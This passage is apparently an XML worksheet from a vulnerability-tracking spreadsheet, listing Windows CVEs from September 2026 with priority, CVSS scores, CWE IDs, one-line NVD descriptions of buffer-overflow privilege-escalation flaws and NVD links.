      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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9" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71337</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-130</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71343</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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2" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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3" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72990</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72991</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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6" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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7" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72995</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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9" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72996</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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2" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73001</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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3" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73002</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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4" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73007</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73011</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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6" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
